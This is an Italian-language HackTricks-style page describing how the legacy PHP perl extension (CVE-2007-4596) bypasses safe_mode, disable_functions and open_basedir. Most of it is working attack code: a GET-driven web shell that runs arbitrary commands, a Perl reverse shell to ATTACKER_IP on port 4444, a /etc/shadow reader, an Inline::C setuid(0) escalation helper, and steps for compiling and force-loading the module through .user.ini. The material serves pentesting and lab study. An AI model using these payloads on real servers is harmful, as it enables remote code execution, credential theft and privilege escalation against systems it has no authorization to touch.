PHP Perl Extension Safe_mode Bypass Exploit

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Contesto

Il problema tracciato come CVE-2007-4596 deriva dall’estensione PHP legacy perl, che incorpora un interprete Perl completo senza rispettare i controlli PHP safe_mode, disable_functions o open_basedir. Qualsiasi worker PHP che carica extension=perl.so ottiene un eval Perl senza restrizioni, quindi l’esecuzione di comandi rimane banale anche quando tutti i primitivi PHP classici per generare processi sono bloccati. Sebbene safe_mode sia scomparso in PHP 5.4, molti stack di hosting condiviso obsoleti e lab vulnerabili lo includono ancora, quindi questo bypass è ancora utile quando ci si trova su pannelli di controllo legacy.

Compatibilità e stato del packaging (2025)

  • L’ultima release PECL (perl-1.0.1, 2013) è destinata a PHP ≥5.0; PHP 8+ in genere fallisce perché le API Zend sono cambiate.
  • PECL viene sostituito da PIE, ma gli stack più vecchi includono ancora PECL/pear. Usa il flusso sotto sui target PHP 5/7; su PHP più recenti aspettati di dover effettuare un downgrade o di passare a un altro percorso di injection (es., userland FFI).

Costruire un ambiente testabile nel 2025

  • Recupera perl-1.0.1 da PECL, compila per il ramo PHP che prevedi di attaccare e caricalo globalmente (php.ini) o tramite dl() (se permesso).
  • Ricetta rapida per laboratorio basato su Debian:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • Durante lo sfruttamento verifica la disponibilità con var_dump(extension_loaded('perl')); o print_r(get_loaded_extensions());. Se assente, cerca perl.so o sfrutta voci scrivibili in php.ini/.user.ini per forzarne il caricamento.
  • Poiché l’interprete risiede all’interno del worker PHP, non sono necessari binari esterni — i filtri di egress della rete o le blacklist di proc_open non contano.

Catena di build on-host quando phpize è raggiungibile

Se phpize e build-essential sono presenti sull’host compromesso, puoi compilare e posare perl.so senza invocare la shell dell’OS:

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

Se open_basedir è applicato, assicurati che i file .user.ini e .so inseriti si trovino in un percorso consentito; la direttiva extension= è ancora rispettata all’interno del basedir. Il flusso di compilazione rispecchia il manuale PHP per la costruzione di estensioni PECL.

Original PoC (NetJackal)

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, ancora utile per confermare che l’estensione risponda a eval:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Miglioramenti moderni del payload

1. TTY completo su TCP

L’interprete incorporato può caricare IO::Socket anche se /usr/bin/perl è bloccato:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. File-System Escape Even with open_basedir

Perl ignora open_basedir di PHP, quindi puoi leggere file arbitrari:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Inoltra l’output tramite IO::Socket::INET o Net::HTTP per exfiltrate data senza toccare i descrittori gestiti da PHP.

3. Inline Compilation for Privilege Escalation

Se Inline::C è presente a livello di sistema, compila helper all’interno della richiesta senza fare affidamento su PHP’s ffi o pcntl:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Tratta Perl come una LOLBAS toolkit — ad esempio, dump MySQL DSNs anche se mysqli è assente:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

Riferimenti

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks